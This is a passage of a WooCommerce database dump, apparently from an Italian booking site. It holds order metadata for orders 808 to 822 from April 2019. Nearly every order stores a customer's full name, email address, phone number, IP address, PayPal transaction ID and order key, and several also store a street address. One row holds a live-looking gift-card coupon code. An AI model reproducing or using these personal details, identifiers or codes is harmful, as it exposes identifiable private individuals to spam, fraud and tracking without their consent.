148910483)'),(16988,808,'_created_via','checkout'),(16989,808,'_date_completed',''),(16990,808,'_completed_date',''),(16991,808,'_date_paid',''),(16992,808,'_paid_date',''),(16993,808,'_cart_hash','5e2cc3b812687e2327c466a5e962ffcc'),(16994,808,'_billing_first_name','Olga'),(16995,808,'_billing_last_name','Rosca'),(16996,808,'_billing_company',''),(16997,808,'_billing_address_1','Vi Gerrardo Dottori 94'),(16998,808,'_billing_address_2',''),(16999,808,'_billing_city','oliunea@icloud.com'),(17000,808,'_billing_state',''),(17001,808,'_billing_postcode',''),(17002,808,'_billing_country',''),(17003,808,'_billing_email','Oliunea@icloud.com'),(17004,808,'_billing_phone','3279393542'),(17005,808,'_shipping_first_name',''),(17006,808,'_shipping_last_name',''),(17007,808,'_shipping_company',''),(17008,808,'_shipping_address_1',''),(17009,808,'_shipping_address_2',''),(17010,808,'_shipping_city',''),(17011,808,'_shipping_state',''),(17012,808,'_shipping_postcode',''),(17013,808,'_shipping_country',''),(17014,808,'_order_currency','EUR'),(17015,808,'_cart_discount','0'),(17016,808,'_cart_discount_tax','0'),(17017,808,'_order_shipping','0.00'),(17018,808,'_order_shipping_tax','0'),(17019,808,'_order_tax','0'),(17020,808,'_order_total','120.00'),(17021,808,'_order_version','3.5.7'),(17022,808,'_prices_include_tax','no'),(17023,808,'_billing_address_index','Olga Rosca  Vi Gerrardo Dottori 94  oliunea@icloud.com    Oliunea@icloud.com 3279393542'),(17024,808,'_shipping_address_index','        '),(17025,808,'Quanti adulti?','4'),(17026,808,'Numero bambini fino a 6 anni','0'),(17027,808,'Numero ragazzi fino a 14 anni','0'),(17028,808,'Numero ragazzi dai 15 anni in su','0'),(17029,808,'Files attached','[]'),(17030,809,'_order_key','wc_order_b0H0i772emwUO'),(17031,809,'_customer_user','52'),(17032,809,'_payment_method','paypal'),(17033,809,'_payment_method_title','PayPal'),(17034,809,'_transaction_id','7F8249651B7032533'),(17035,809,'_customer_ip_address','158.148.78.174'),(17036,809,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/72.0.3626.101 Mobile/15E148 Safari/605.1'),(17037,809,'_created_via','checkout'),(17038,809,'_date_completed',''),(17039,809,'_completed_date',''),(17040,809,'_date_paid','1555506179'),(17041,809,'_paid_date','2019-04-17 15:02:59'),(17042,809,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(17043,809,'_billing_first_name','Riccardo'),(17044,809,'_billing_last_name','Bortolamasi'),(17045,809,'_billing_company',''),(17046,809,'_billing_address_1',''),(17047,809,'_billing_address_2',''),(17048,809,'_billing_city',''),(17049,809,'_billing_state',''),(17050,809,'_billing_postcode',''),(17051,809,'_billing_country',''),(17052,809,'_billing_email','natalinofaina567@hotmail.it'),(17053,809,'_billing_phone','3462109202'),(17054,809,'_shipping_first_name',''),(17055,809,'_shipping_last_name',''),(17056,809,'_shipping_company',''),(17057,809,'_shipping_address_1',''),(17058,809,'_shipping_address_2',''),(17059,809,'_shipping_city',''),(17060,809,'_shipping_state',''),(17061,809,'_shipping_postcode',''),(17062,809,'_shipping_country',''),(17063,809,'_order_currency','EUR'),(17064,809,'_cart_discount','0'),(17065,809,'_cart_discount_tax','0'),(17066,809,'_order_shipping','0.00'),(17067,809,'_order_shipping_tax','0'),(17068,809,'_order_tax','0'),(17069,809,'_order_total','60.00'),(17070,809,'_order_version','3.5.7'),(17071,809,'_prices_include_tax','no'),(17072,809,'_billing_address_index','Riccardo Bortolamasi        natalinofaina567@hotmail.it 3462109202'),(17073,809,'_shipping_address_index','        '),(17074,809,'Quanti adulti?','2'),(17075,809,'Numero bambini fino a 6 anni','0'),(17076,809,'Numero ragazzi fino a 14 anni','0'),(17077,809,'Numero ragazzi dai 15 anni in su','0'),(17078,809,'Files attached','[]'),(17079,809,'Payment type','instant'),(17080,809,'_paypal_status','completed'),(17081,809,'_download_permissions_granted','yes'),(17082,809,'_recorded_sales','yes'),(17083,809,'_recorded_coupon_usage_counts','yes'),(17084,809,'_order_stock_reduced','yes'),(17085,809,'PayPal Transaction Fee','2.39'),(17086,810,'_order_key','wc_order_oeDoW6NpJ0245'),(17087,810,'_customer_user','0'),(17088,810,'_payment_method','paypal'),(17089,810,'_payment_method_title','PayPal'),(17090,810,'_transaction_id',''),(17091,810,'_customer_ip_address','188.218.170.212'),(17092,810,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1'),(17093,810,'_created_via','checkout'),(17094,810,'_date_completed',''),(17095,810,'_completed_date',''),(17096,810,'_date_paid',''),(17097,810,'_paid_date',''),(17098,810,'_cart_hash','5e2cc3b812687e2327c466a5e962ffcc'),(17099,810,'_billing_first_name','Matteo'),(17100,810,'_billing_last_name','Sandrini'),(17101,810,'_billing_company',''),(17102,810,'_billing_address_1',''),(17103,810,'_billing_address_2',''),(17104,810,'_billing_city','Muggiò'),(17105,810,'_billing_state',''),(17106,810,'_billing_postcode',''),(17107,810,'_billing_country',''),(17108,810,'_billing_email','Matteo.sandrini@live.it'),(17109,810,'_billing_phone','3481662454'),(17110,810,'_shipping_first_name',''),(17111,810,'_shipping_last_name',''),(17112,810,'_shipping_company',''),(17113,810,'_shipping_address_1',''),(17114,810,'_shipping_address_2',''),(17115,810,'_shipping_city',''),(17116,810,'_shipping_state',''),(17117,810,'_shipping_postcode',''),(17118,810,'_shipping_country',''),(17119,810,'_order_currency','EUR'),(17120,810,'_cart_discount','0'),(17121,810,'_cart_discount_tax','0'),(17122,810,'_order_shipping','0.00'),(17123,810,'_order_shipping_tax','0'),(17124,810,'_order_tax','0'),(17125,810,'_order_total','120.00'),(17126,810,'_order_version','3.5.7'),(17127,810,'_prices_include_tax','no'),(17128,810,'_billing_address_index','Matteo Sandrini    Muggiò    Matteo.sandrini@live.it 3481662454'),(17129,810,'_shipping_address_index','        '),(17130,810,'Quanti adulti?','4'),(17131,810,'Numero bambini fino a 6 anni','1'),(17132,810,'Numero ragazzi fino a 14 anni','0'),(17133,810,'Numero ragazzi dai 15 anni in su','0'),(17134,810,'Files attached','[]'),(17135,811,'_order_key','wc_order_h2Ba3BvZboAYh'),(17136,811,'_customer_user','0'),(17137,811,'_payment_method','paypal'),(17138,811,'_payment_method_title','PayPal'),(17139,811,'_transaction_id','03S39248KD815135C'),(17140,811,'_customer_ip_address','95.249.180.50'),(17141,811,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) CriOS/71.0.3578.89 Mobile/14G60 Safari/602.1'),(17142,811,'_created_via','checkout'),(17143,811,'_date_completed',''),(17144,811,'_completed_date',''),(17145,811,'_date_paid','1555527846'),(17146,811,'_paid_date','2019-04-17 21:04:06'),(17147,811,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(17148,811,'_billing_first_name','Pino'),(17149,811,'_billing_last_name','Valgimigli'),(17150,811,'_billing_company',''),(17151,811,'_billing_address_1','Via Corbari 239'),(17152,811,'_billing_address_2',''),(17153,811,'_billing_city','Faenza'),(17154,811,'_billing_state',''),(17155,811,'_billing_postcode',''),(17156,811,'_billing_country',''),(17157,811,'_billing_email','pinovalgimigli@gmail.com'),(17158,811,'_billing_phone','3495758562'),(17159,811,'_shipping_first_name',''),(17160,811,'_shipping_last_name',''),(17161,811,'_shipping_company',''),(17162,811,'_shipping_address_1',''),(17163,811,'_shipping_address_2',''),(17164,811,'_shipping_city',''),(17165,811,'_shipping_state',''),(17166,811,'_shipping_postcode',''),(17167,811,'_shipping_country',''),(17168,811,'_order_currency','EUR'),(17169,811,'_cart_discount','0'),(17170,811,'_cart_discount_tax','0'),(17171,811,'_order_shipping','0.00'),(17172,811,'_order_shipping_tax','0'),(17173,811,'_order_tax','0'),(17174,811,'_order_total','60.00'),(17175,811,'_order_version','3.5.7'),(17176,811,'_prices_include_tax','no'),(17177,811,'_billing_address_index','Pino Valgimigli  Via Corbari 239  Faenza    pinovalgimigli@gmail.com 3495758562'),(17178,811,'_shipping_address_index','        '),(17179,811,'Quanti adulti?','2'),(17180,811,'Numero bambini fino a 6 anni','0'),(17181,811,'Numero ragazzi fino a 14 anni','0'),(17182,811,'Numero ragazzi dai 15 anni in su','0'),(17183,811,'Files attached','[]'),(17184,811,'Payment type','instant'),(17185,811,'_paypal_status','completed'),(17186,811,'_download_permissions_granted','yes'),(17187,811,'_recorded_sales','yes'),(17188,811,'_recorded_coupon_usage_counts','yes'),(17189,811,'_order_stock_reduced','yes'),(17190,811,'PayPal Transaction Fee','2.39'),(17191,812,'_order_key','wc_order_fXDW530B54Dl8'),(17192,812,'_customer_user','0'),(17193,812,'_payment_method','paypal'),(17194,812,'_payment_method_title','PayPal'),(17195,812,'_transaction_id',''),(17196,812,'_customer_ip_address','79.49.38.25'),(17197,812,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),(17198,812,'_created_via','checkout'),(17199,812,'_date_completed',''),(17200,812,'_completed_date',''),(17201,812,'_date_paid',''),(17202,812,'_paid_date',''),(17203,812,'_cart_hash','5e2cc3b812687e2327c466a5e962ffcc'),(17204,812,'_billing_first_name','Maria Chiara'),(17205,812,'_billing_last_name','Molinari'),(17206,812,'_billing_company',''),(17207,812,'_billing_address_1',''),(17208,812,'_billing_address_2',''),(17209,812,'_billing_city',''),(17210,812,'_billing_state',''),(17211,812,'_billing_postcode',''),(17212,812,'_billing_country',''),(17213,812,'_billing_email','molinari.mariachiara@gmail.com'),(17214,812,'_billing_phone','+39 349 3480437'),(17215,812,'_shipping_first_name',''),(17216,812,'_shipping_last_name',''),(17217,812,'_shipping_company',''),(17218,812,'_shipping_address_1',''),(17219,812,'_shipping_address_2',''),(17220,812,'_shipping_city',''),(17221,812,'_shipping_state',''),(17222,812,'_shipping_postcode',''),(17223,812,'_shipping_country',''),(17224,812,'_order_currency','EUR'),(17225,812,'_cart_discount','0'),(17226,812,'_cart_discount_tax','0'),(17227,812,'_order_shipping','0.00'),(17228,812,'_order_shipping_tax','0'),(17229,812,'_order_tax','0'),(17230,812,'_order_total','120.00'),(17231,812,'_order_version','3.5.7'),(17232,812,'_prices_include_tax','no'),(17233,812,'_billing_address_index','Maria Chiara Molinari        molinari.mariachiara@gmail.com +39 349 3480437'),(17234,812,'_shipping_address_index','        '),(17235,812,'Quanti adulti?','2'),(17236,812,'Numero bambini fino a 6 anni','1'),(17237,812,'Numero ragazzi fino a 14 anni','1'),(17238,812,'Numero ragazzi dai 15 anni in su','0'),(17239,812,'Files attached','[]'),(17240,813,'_order_currency','EUR'),(17241,813,'_cart_discount','0'),(17242,813,'_cart_discount_tax','0'),(17243,813,'_order_shipping','0'),(17244,813,'_order_shipping_tax','0'),(17245,813,'_order_tax','0'),(17246,813,'_order_total','-150.00'),(17247,813,'_order_version','3.5.7'),(17248,813,'_prices_include_tax','no'),(17249,813,'_refund_amount','150'),(17250,813,'_refunded_by','1'),(17251,813,'_refunded_payment',''),(17252,813,'_refund_reason','Ordine completamente rimborsato'),(17253,814,'_order_key','wc_order_KeBVDlS9eMs5v'),(17254,814,'_customer_user','0'),(17255,814,'_payment_method','paypal'),(17256,814,'_payment_method_title','PayPal'),(17257,814,'_transaction_id','66W64046NE8787510'),(17258,814,'_customer_ip_address','93.145.118.202'),(17259,814,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'),(17260,814,'_created_via','checkout'),(17261,814,'_date_completed',''),(17262,814,'_completed_date',''),(17263,814,'_date_paid','1555665817'),(17264,814,'_paid_date','2019-04-19 11:23:37'),(17265,814,'_cart_hash','5e2cc3b812687e2327c466a5e962ffcc'),(17266,814,'_billing_first_name','LUCA'),(17267,814,'_billing_last_name','SCARTEZZINI'),(17268,814,'_billing_company',''),(17269,814,'_billing_address_1','via serenissima repubblica 7'),(17270,814,'_billing_address_2',''),(17271,814,'_billing_city','SAN GIOVANNI LUPATOTO'),(17272,814,'_billing_state',''),(17273,814,'_billing_postcode',''),(17274,814,'_billing_country',''),(17275,814,'_billing_email','scarte74@alice.it'),(17276,814,'_billing_phone','3472523035'),(17277,814,'_shipping_first_name',''),(17278,814,'_shipping_last_name',''),(17279,814,'_shipping_company',''),(17280,814,'_shipping_address_1',''),(17281,814,'_shipping_address_2',''),(17282,814,'_shipping_city',''),(17283,814,'_shipping_state',''),(17284,814,'_shipping_postcode',''),(17285,814,'_shipping_country',''),(17286,814,'_order_currency','EUR'),(17287,814,'_cart_discount','0'),(17288,814,'_cart_discount_tax','0'),(17289,814,'_order_shipping','0.00'),(17290,814,'_order_shipping_tax','0'),(17291,814,'_order_tax','0'),(17292,814,'_order_total','120.00'),(17293,814,'_order_version','3.5.7'),(17294,814,'_prices_include_tax','no'),(17295,814,'_billing_address_index','LUCA SCARTEZZINI  via serenissima repubblica 7  SAN GIOVANNI LUPATOTO    scarte74@alice.it 3472523035'),(17296,814,'_shipping_address_index','        '),(17297,814,'Quanti adulti?','2'),(17298,814,'Numero bambini fino a 6 anni','0'),(17299,814,'Numero ragazzi fino a 14 anni','1'),(17300,814,'Numero ragazzi dai 15 anni in su','1'),(17301,814,'Files attached','[]'),(17302,814,'Payment type','instant'),(17303,814,'_paypal_status','completed'),(17304,814,'_download_permissions_granted','yes'),(17305,814,'_recorded_sales','yes'),(17306,814,'_recorded_coupon_usage_counts','yes'),(17307,814,'_order_stock_reduced','yes'),(17308,814,'PayPal Transaction Fee','4.43'),(17309,815,'_order_key','wc_order_QjQg0qPbwu08P'),(17310,815,'_customer_user','53'),(17311,815,'_payment_method','paypal'),(17312,815,'_payment_method_title','PayPal'),(17313,815,'_transaction_id','1BL37032SS0817233'),(17314,815,'_customer_ip_address','79.54.209.165'),(17315,815,'_customer_user_agent','Mozilla/5.0 (Linux; Android 8.0.0; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36'),(17316,815,'_created_via','checkout'),(17317,815,'_date_completed',''),(17318,815,'_completed_date',''),(17319,815,'_date_paid','1555752417'),(17320,815,'_paid_date','2019-04-20 11:26:57'),(17321,815,'_cart_hash','e16c393c7e7a4305aee55ffa5d5cd0eb'),(17322,815,'_billing_first_name','Alessandro'),(17323,815,'_billing_last_name','Zappa'),(17324,815,'_billing_company',''),(17325,815,'_billing_address_1',''),(17326,815,'_billing_address_2',''),(17327,815,'_billing_city',''),(17328,815,'_billing_state',''),(17329,815,'_billing_postcode',''),(17330,815,'_billing_country',''),(17331,815,'_billing_email','zzzale@gmail.com'),(17332,815,'_billing_phone','3472440411'),(17333,815,'_shipping_first_name',''),(17334,815,'_shipping_last_name',''),(17335,815,'_shipping_company',''),(17336,815,'_shipping_address_1',''),(17337,815,'_shipping_address_2',''),(17338,815,'_shipping_city',''),(17339,815,'_shipping_state',''),(17340,815,'_shipping_postcode',''),(17341,815,'_shipping_country',''),(17342,815,'_order_currency','EUR'),(17343,815,'_cart_discount','0'),(17344,815,'_cart_discount_tax','0'),(17345,815,'_order_shipping','0.00'),(17346,815,'_order_shipping_tax','0'),(17347,815,'_order_tax','0'),(17348,815,'_order_total','120.00'),(17349,815,'_order_version','3.5.7'),(17350,815,'_prices_include_tax','no'),(17351,815,'_billing_address_index','Alessandro Zappa        zzzale@gmail.com 3472440411'),(17352,815,'_shipping_address_index','        '),(17353,815,'Quanti adulti?','2'),(17354,815,'Numero bambini fino a 6 anni','1'),(17355,815,'Numero ragazzi fino a 14 anni','1'),(17356,815,'Numero ragazzi dai 15 anni in su','0'),(17357,815,'Files attached','[]'),(17358,815,'Payment type','instant'),(17359,815,'_paypal_status','completed'),(17360,815,'_download_permissions_granted','yes'),(17361,815,'_recorded_sales','yes'),(17362,815,'_recorded_coupon_usage_counts','yes'),(17363,815,'_order_stock_reduced','yes'),(17364,815,'PayPal Transaction Fee','4.43'),(17365,816,'_order_key','wc_order_oXo48zRysj138'),(17366,816,'_customer_user','0'),(17367,816,'_payment_method','paypal'),(17368,816,'_payment_method_title','PayPal'),(17369,816,'_transaction_id','8TS38499AB263014Y'),(17370,816,'_customer_ip_address','95.74.29.85'),(17371,816,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0 Mobile/14C92 Safari/602.1'),(17372,816,'_created_via','checkout'),(17373,816,'_date_completed',''),(17374,816,'_completed_date',''),(17375,816,'_date_paid','1555761715'),(17376,816,'_paid_date','2019-04-20 14:01:55'),(17377,816,'_cart_hash','df8de5272d1715d0b6febccd52179cdf'),(17378,816,'_billing_first_name','Fabiola'),(17379,816,'_billing_last_name','Cardarelli'),(17380,816,'_billing_company',''),(17381,816,'_billing_address_1',''),(17382,816,'_billing_address_2',''),(17383,816,'_billing_city',''),(17384,816,'_billing_state',''),(17385,816,'_billing_postcode',''),(17386,816,'_billing_country',''),(17387,816,'_billing_email','Fabiola.lptubi@libero.it'),(17388,816,'_billing_phone','3332013778'),(17389,816,'_shipping_first_name',''),(17390,816,'_shipping_last_name',''),(17391,816,'_shipping_company',''),(17392,816,'_shipping_address_1',''),(17393,816,'_shipping_address_2',''),(17394,816,'_shipping_city',''),(17395,816,'_shipping_state',''),(17396,816,'_shipping_postcode',''),(17397,816,'_shipping_country',''),(17398,816,'_order_currency','EUR'),(17399,816,'_cart_discount','0'),(17400,816,'_cart_discount_tax','0'),(17401,816,'_order_shipping','0.00'),(17402,816,'_order_shipping_tax','0'),(17403,816,'_order_tax','0'),(17404,816,'_order_total','90.00'),(17405,816,'_order_version','3.5.7'),(17406,816,'_prices_include_tax','no'),(17407,816,'_billing_address_index','Fabiola Cardarelli        Fabiola.lptubi@libero.it 3332013778'),(17408,816,'_shipping_address_index','        '),(17409,816,'Quanti adulti?','2'),(17410,816,'Numero bambini fino a 6 anni','1'),(17411,816,'Numero ragazzi fino a 14 anni','0'),(17412,816,'Numero ragazzi dai 15 anni in su','0'),(17413,816,'Files attached','[]'),(17414,817,'_order_key','wc_order_2fpd7EL1b4Stm'),(17415,817,'_customer_user','0'),(17416,817,'_payment_method','paypal'),(17417,817,'_payment_method_title','PayPal'),(17418,817,'_transaction_id','4TS916252L686031R'),(17419,817,'_customer_ip_address','91.253.234.237'),(17420,817,'_customer_user_agent','Mozilla/5.0 (Linux; Android 9; SM-G965F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36'),(17421,817,'_created_via','checkout'),(17422,817,'_date_completed',''),(17423,817,'_completed_date',''),(17424,817,'_date_paid','1555760900'),(17425,817,'_paid_date','2019-04-20 13:48:20'),(17426,817,'_cart_hash','5e2cc3b812687e2327c466a5e962ffcc'),(17427,817,'_billing_first_name','Antonio'),(17428,817,'_billing_last_name','Picca'),(17429,817,'_billing_company',''),(17430,817,'_billing_address_1','via Tavoleto,76'),(17431,817,'_billing_address_2',''),(17432,817,'_billing_city','San Clemente'),(17433,817,'_billing_state',''),(17434,817,'_billing_postcode',''),(17435,817,'_billing_country',''),(17436,817,'_billing_email','piccaantonio@live.it'),(17437,817,'_billing_phone','3402490943'),(17438,817,'_shipping_first_name',''),(17439,817,'_shipping_last_name',''),(17440,817,'_shipping_company',''),(17441,817,'_shipping_address_1',''),(17442,817,'_shipping_address_2',''),(17443,817,'_shipping_city',''),(17444,817,'_shipping_state',''),(17445,817,'_shipping_postcode',''),(17446,817,'_shipping_country',''),(17447,817,'_order_currency','EUR'),(17448,817,'_cart_discount','0'),(17449,817,'_cart_discount_tax','0'),(17450,817,'_order_shipping','0.00'),(17451,817,'_order_shipping_tax','0'),(17452,817,'_order_tax','0'),(17453,817,'_order_total','120.00'),(17454,817,'_order_version','3.5.7'),(17455,817,'_prices_include_tax','no'),(17456,817,'_billing_address_index','Antonio Picca  via Tavoleto,76  San Clemente    piccaantonio@live.it 3402490943'),(17457,817,'_shipping_address_index','        '),(17458,817,'Quanti adulti?','2'),(17459,817,'Numero bambini fino a 6 anni','0'),(17460,817,'Numero ragazzi fino a 14 anni','2'),(17461,817,'Numero ragazzi dai 15 anni in su','0'),(17462,817,'Files attached','[]'),(17463,817,'Payment type','instant'),(17464,817,'_paypal_status','completed'),(17465,817,'_download_permissions_granted','yes'),(17466,817,'_recorded_sales','yes'),(17467,817,'_recorded_coupon_usage_counts','yes'),(17468,817,'_order_stock_reduced','yes'),(17469,817,'PayPal Transaction Fee','4.43'),(17470,816,'Payment type','instant'),(17471,816,'_paypal_status','completed'),(17472,816,'_download_permissions_granted','yes'),(17473,816,'_recorded_sales','yes'),(17474,816,'_recorded_coupon_usage_counts','yes'),(17475,816,'_order_stock_reduced','yes'),(17476,816,'PayPal Transaction Fee','3.41'),(17477,818,'_order_key','wc_order_HNnseqQt8lOCW'),(17478,818,'_customer_user','54'),(17479,818,'_payment_method','paypal'),(17480,818,'_payment_method_title','PayPal'),(17481,818,'_transaction_id','2J38431732463025U'),(17482,818,'_customer_ip_address','2.35.189.252'),(17483,818,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/73.0.3683.68 Mobile/15E148 Safari/605.1'),(17484,818,'_created_via','checkout'),(17485,818,'_date_completed',''),(17486,818,'_completed_date',''),(17487,818,'_date_paid','1555783716'),(17488,818,'_paid_date','2019-04-20 20:08:36'),(17489,818,'_cart_hash','756f73f11b0cec532b23c141ee80f71f'),(17490,818,'_billing_first_name','Fabio'),(17491,818,'_billing_last_name','Bertelli'),(17492,818,'_billing_company',''),(17493,818,'_billing_address_1','Via cagnacci 29'),(17494,818,'_billing_address_2',''),(17495,818,'_billing_city','Rimini'),(17496,818,'_billing_state',''),(17497,818,'_billing_postcode',''),(17498,818,'_billing_country',''),(17499,818,'_billing_email','Fbambulatorio@gmail.com'),(17500,818,'_billing_phone','3386471737'),(17501,818,'_shipping_first_name',''),(17502,818,'_shipping_last_name',''),(17503,818,'_shipping_company',''),(17504,818,'_shipping_address_1',''),(17505,818,'_shipping_address_2',''),(17506,818,'_shipping_city',''),(17507,818,'_shipping_state',''),(17508,818,'_shipping_postcode',''),(17509,818,'_shipping_country',''),(17510,818,'_order_currency','EUR'),(17511,818,'_cart_discount','0'),(17512,818,'_cart_discount_tax','0'),(17513,818,'_order_shipping','0.00'),(17514,818,'_order_shipping_tax','0'),(17515,818,'_order_tax','0'),(17516,818,'_order_total','60.00'),(17517,818,'_order_version','3.5.7'),(17518,818,'_prices_include_tax','no'),(17519,818,'_billing_address_index','Fabio Bertelli  Via cagnacci 29  Rimini    Fbambulatorio@gmail.com 3386471737'),(17520,818,'_shipping_address_index','        '),(17521,818,'Quanti adulti?','2'),(17522,818,'Numero bambini fino a 6 anni','0'),(17523,818,'Numero ragazzi fino a 14 anni','0'),(17524,818,'Numero ragazzi dai 15 anni in su','0'),(17525,818,'Files attached','[]'),(17526,818,'Payment type','instant'),(17527,818,'_paypal_status','completed'),(17528,818,'_download_permissions_granted','yes'),(17529,818,'_recorded_sales','yes'),(17530,818,'_recorded_coupon_usage_counts','yes'),(17531,818,'_order_stock_reduced','yes'),(17532,818,'PayPal Transaction Fee','2.39'),(17533,819,'_order_key','wc_order_nY3T7zZEE6NMr'),(17534,819,'_customer_user','0'),(17535,819,'_payment_method','paypal'),(17536,819,'_payment_method_title','PayPal'),(17537,819,'_transaction_id','9VA60805BW9814204'),(17538,819,'_customer_ip_address','93.65.143.183'),(17539,819,'_customer_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'),(17540,819,'_created_via','checkout'),(17541,819,'_date_completed',''),(17542,819,'_completed_date',''),(17543,819,'_date_paid','1555923610'),(17544,819,'_paid_date','2019-04-22 11:00:10'),(17545,819,'_cart_hash','4cc1028c1fa8fe9a42f5fa931ed54c5a'),(17546,819,'_billing_first_name','Riccardo'),(17547,819,'_billing_last_name','Rossi'),(17548,819,'_billing_company',''),(17549,819,'_billing_address_1',''),(17550,819,'_billing_address_2',''),(17551,819,'_billing_city',''),(17552,819,'_billing_state',''),(17553,819,'_billing_postcode',''),(17554,819,'_billing_country',''),(17555,819,'_billing_email','rrossi@red-fluid.com'),(17556,819,'_billing_phone','3280573440'),(17557,819,'_shipping_first_name',''),(17558,819,'_shipping_last_name',''),(17559,819,'_shipping_company',''),(17560,819,'_shipping_address_1',''),(17561,819,'_shipping_address_2',''),(17562,819,'_shipping_city',''),(17563,819,'_shipping_state',''),(17564,819,'_shipping_postcode',''),(17565,819,'_shipping_country',''),(17566,819,'_order_currency','EUR'),(17567,819,'_cart_discount','0'),(17568,819,'_cart_discount_tax','0'),(17569,819,'_order_shipping','0.00'),(17570,819,'_order_shipping_tax','0'),(17571,819,'_order_tax','0'),(17572,819,'_order_total','60.00'),(17573,819,'_order_version','3.5.7'),(17574,819,'_prices_include_tax','no'),(17575,819,'_billing_address_index','Riccardo Rossi        rrossi@red-fluid.com 3280573440'),(17576,819,'_shipping_address_index','        '),(17577,819,'Quanti adulti?','3'),(17578,819,'Numero bambini fino a 6 anni','0'),(17579,819,'Numero ragazzi fino a 14 anni','0'),(17580,819,'Numero ragazzi dai 15 anni in su','0'),(17581,819,'Files attached','[]'),(17582,819,'Payment type','instant'),(17583,819,'_paypal_status','completed'),(17584,819,'_download_permissions_granted','yes'),(17585,819,'_recorded_sales','yes'),(17586,819,'_recorded_coupon_usage_counts','yes'),(17587,819,'_order_stock_reduced','yes'),(17588,819,'PayPal Transaction Fee','2.39'),(17589,820,'_order_key','wc_order_IO2HzWXM9gif2'),(17590,820,'_customer_user','55'),(17591,820,'_payment_method','paypal'),(17592,820,'_payment_method_title','PayPal'),(17593,820,'_transaction_id','9UM13017V5664763U'),(17594,820,'_customer_ip_address','79.42.48.74'),(17595,820,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'),(17596,820,'_created_via','checkout'),(17597,820,'_date_completed','1556039683'),(17598,820,'_completed_date','2019-04-23 19:14:43'),(17599,820,'_date_paid','1556039343'),(17600,820,'_paid_date','2019-04-23 19:09:03'),(17601,820,'_cart_hash','708de813a9defe64735af881630f6fcf'),(17602,820,'_billing_first_name','Fabio'),(17603,820,'_billing_last_name','Domenichini'),(17604,820,'_billing_company',''),(17605,820,'_billing_address_1',''),(17606,820,'_billing_address_2',''),(17607,820,'_billing_city',''),(17608,820,'_billing_state',''),(17609,820,'_billing_postcode',''),(17610,820,'_billing_country',''),(17611,820,'_billing_email','fabio.domenichini92@gmail.com'),(17612,820,'_billing_phone','3491228579'),(17613,820,'_shipping_first_name',''),(17614,820,'_shipping_last_name',''),(17615,820,'_shipping_company',''),(17616,820,'_shipping_address_1',''),(17617,820,'_shipping_address_2',''),(17618,820,'_shipping_city',''),(17619,820,'_shipping_state',''),(17620,820,'_shipping_postcode',''),(17621,820,'_shipping_country',''),(17622,820,'_order_currency','EUR'),(17623,820,'_cart_discount','0'),(17624,820,'_cart_discount_tax','0'),(17625,820,'_order_shipping','0.00'),(17626,820,'_order_shipping_tax','0'),(17627,820,'_order_tax','0'),(17628,820,'_order_total','80.00'),(17629,820,'_order_version','3.5.7'),(17630,820,'_prices_include_tax','no'),(17631,820,'_billing_address_index','Fabio Domenichini        fabio.domenichini92@gmail.com 3491228579'),(17632,820,'_shipping_address_index','        '),(17633,820,'Quanti adulti?','1'),(17634,820,'Numero bambini fino a 6 anni','0'),(17635,820,'Numero ragazzi fino a 14 anni','0'),(17636,820,'Numero ragazzi dai 15 anni in su','0'),(17637,820,'Files attached','[]'),(17638,820,'Payment type','instant'),(17639,820,'_paypal_status','completed'),(17640,820,'_download_permissions_granted','yes'),(17641,820,'_recorded_sales','yes'),(17642,820,'_recorded_coupon_usage_counts','yes'),(17643,820,'_order_stock_reduced','yes'),(17644,821,'discount_type','fixed_cart'),(17645,821,'coupon_amount','80'),(17646,821,'individual_use','no'),(17647,821,'usage_limit','1'),(17648,821,'expiry_date','2019-10-20'),(17649,821,'apply_before_tax','no'),(17650,821,'free_shipping','yes'),(17651,821,'minimum_amount',''),(17652,821,'maximum_amount',''),(17653,821,'exclude_sale_items','no'),(17654,821,'exclude_product_categories',''),(17655,821,'exclude_product_ids',''),(17656,821,'mwb_wgm_giftcard_coupon','820'),(17657,821,'mwb_wgm_giftcard_coupon_unique','online'),(17658,821,'mwb_wgm_giftcard_coupon_product_id','548'),(17659,821,'mwb_wgm_giftcard_coupon_mail_to','Andrea'),(17660,820,'820#311','solymarcouponKOBC3'),(17661,820,'mwb_wgm_order_giftcard','send'),(17662,820,'PayPal Transaction Fee','3.07'),(17663,822,'_order_key','wc_order_cg8brC3t2IJsz'),(17664,822,'_customer_user','0'),(17665,822,'_payment_method','paypal'),(17666,822,'_payment_method_title','PayPal'),(17667,822,'_transaction_id','7JA482483K3397347'),(17668,822,'_customer_ip_address','91.253.56.40'),(17669,822,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 